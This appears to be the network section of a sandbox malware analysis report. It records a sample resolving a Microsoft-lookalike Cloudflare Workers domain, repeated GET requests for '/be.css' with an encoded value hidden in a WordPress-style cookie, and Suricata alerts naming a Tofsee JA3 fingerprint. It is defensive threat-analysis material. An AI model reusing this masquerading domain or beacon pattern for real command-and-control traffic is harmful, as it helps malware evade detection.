Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
updata.microsoft-api.workers.dev | 172.67.159.138 |
- UDP Requests
-
-
192.168.56.102:62147 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:49188 239.255.255.250:1900
-
192.168.56.102:49190 239.255.255.250:3702
-
192.168.56.102:49192 239.255.255.250:3702
-
192.168.56.102:49194 239.255.255.250:3702
-
GET
200
https://updata.microsoft-api.workers.dev/be.css
REQUEST
RESPONSE
BODY
GET /be.css HTTP/1.1
Accept: */*
Host: updata.microsoft-api.workers.dev
Connection: Close
Accept-Language: fr-CH, fr;q=0.9, en;q=0.8, de;q=0.7, *;q=0.5
Cookie: wordpress_d6c0405e0d7ab18fd4e6a0b74fce40b0=YW9qYW1pbmhnbmZsbWhtbGVsbmtwZ2NpaGJkaHBwZm5laGRnYmJram1rbWhkbWdub2ZvYWVvbmJmcGtqZ2dia2dsb2xhYmxuZ2tnbmhjbWdncGFmbHBkZGhlb2RjY2plZmVmbGZkbmtnZWlwa2hoYWppY2lqa2ZsaWhnZGNqa2FqaGNlam9lYWhkZWJsZmZvaWZsb29rYWppaGxkaW9kZGdiaGNvamJnZGZwY2hobW5wbWtqY2ltbGFuZWlsamhlY2FmaWJwbWJlZmdqbWVscGFmb2ZjcGJvZXBkYm1ubHBpY2hvYmNkYmhrZW5iamljYWJmZGtwbWJwcGFvYmxpYg==
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 29 Oct 2021 09:28:40 GMT
Content-Type: text/css
Content-Length: 1767
Connection: close
CF-Ray: 6a5b5ff818cd0a7a-KIX
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W3qepSkKqVgOfIr2Ug3vX%2FozVenDb%2F6UfHlKzz37gQBMp7HtqNWFupKmZNdLfyJ0LwXz%2Fv6x%2BHF07%2BkQBtbX5Ke1tbU4h8Ph6y%2B9IKMLCW0UIw8H1CRjmdaJp2uSyP8Qn72u0qG%2F%2BpyYcZDKFFd4ntAjFw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET
200
https://updata.microsoft-api.workers.dev/be.css
REQUEST
RESPONSE
BODY
GET /be.css HTTP/1.1
Accept: */*
Host: updata.microsoft-api.workers.dev
Connection: Close
Accept-Language: fr-CH, fr;q=0.9, en;q=0.8, de;q=0.7, *;q=0.5
Cookie: wordpress_d6c0405e0d7ab18fd4e6a0b74fce40b0=YW9qYW1pbmhnbmZsbWhtbGVsbmtwZ2NpaGJkaHBwZm5laGRnYmJram1rbWhkbWdub2ZvYWVvbmJmcGtqZ2dia2dsb2xhYmxuZ2tnbmhjbWdncGFmbHBkZGhlb2RjY2plZmVmbGZkbmtnZWlwa2hoYWppY2lqa2ZsaWhnZGNqa2FqaGNlam9lYWhkZWJsZmZvaWZsb29rYWppaGxkaW9kZGdiaGNvamJnZGZwY2hobW5wbWtqY2ltbGFuZWlsamhlY2FmaWJwbWJlZmdqbWVscGFmb2ZjcGJvZXBkYm1ubHBpY2hvYmNkYmhrZW5iamljYWJmZGtwbWJwcGFvYmxpYg==
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 29 Oct 2021 09:29:29 GMT
Content-Type: text/css
Content-Length: 1767
Connection: close
CF-Ray: 6a5b613058a00ace-KIX
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TbtVdRnz8tJ1J%2BNZE5YFOVGOJ5QJs%2FdJ3JfpaLdC5fgDgt2Sg%2BpQavk0nsD5rLpCjfUnkvkeUBPg1rU4XkUdY2m46UeCc9UDzWQboafRdJmiDj4RBj%2Bd3OS2d0UC7b82zgnqVR8puq%2FsbaTXayCT3RdhzA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET
200
https://updata.microsoft-api.workers.dev/be.css
REQUEST
RESPONSE
BODY
GET /be.css HTTP/1.1
Accept: */*
Host: updata.microsoft-api.workers.dev
Connection: Close
Accept-Language: fr-CH, fr;q=0.9, en;q=0.8, de;q=0.7, *;q=0.5
Cookie: wordpress_d6c0405e0d7ab18fd4e6a0b74fce40b0=YW9qYW1pbmhnbmZsbWhtbGVsbmtwZ2NpaGJkaHBwZm5laGRnYmJram1rbWhkbWdub2ZvYWVvbmJmcGtqZ2dia2dsb2xhYmxuZ2tnbmhjbWdncGFmbHBkZGhlb2RjY2plZmVmbGZkbmtnZWlwa2hoYWppY2lqa2ZsaWhnZGNqa2FqaGNlam9lYWhkZWJsZmZvaWZsb29rYWppaGxkaW9kZGdiaGNvamJnZGZwY2hobW5wbWtqY2ltbGFuZWlsamhlY2FmaWJwbWJlZmdqbWVscGFmb2ZjcGJvZXBkYm1ubHBpY2hvYmNkYmhrZW5iamljYWJmZGtwbWJwcGFvYmxpYg==
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 29 Oct 2021 09:30:06 GMT
Content-Type: text/css
Content-Length: 1767
Connection: close
CF-Ray: 6a5b62146eb9aedf-KIX
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tGpauppKa6jSffF5rTBVu2aIAzXcfvyeyMv5yjVk2FBYvmPDCbLYTQCHzOoRe0IvhlU6pa0xGRIbi8DxCrPIxKq5JXu0HzWC8E6YuPwlXuWW3tJ7Gj3fWGre%2Bja5ths7BP4BfGHdBPHT2lxwmpDXsi1zxA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49176 -> 172.67.159.138:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49175 -> 172.67.159.138:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49177 -> 172.67.159.138:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49176 172.67.159.138:443 |
None | None | None |
TLSv1 192.168.56.102:49175 172.67.159.138:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | dd:8f:b2:73:61:e0:5d:5d:f2:9b:06:75:7c:ee:cd:a3:37:1f:14:ae |
TLSv1 192.168.56.102:49177 172.67.159.138:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | dd:8f:b2:73:61:e0:5d:5d:f2:9b:06:75:7c:ee:cd:a3:37:1f:14:ae |
Snort Alerts
No Snort Alerts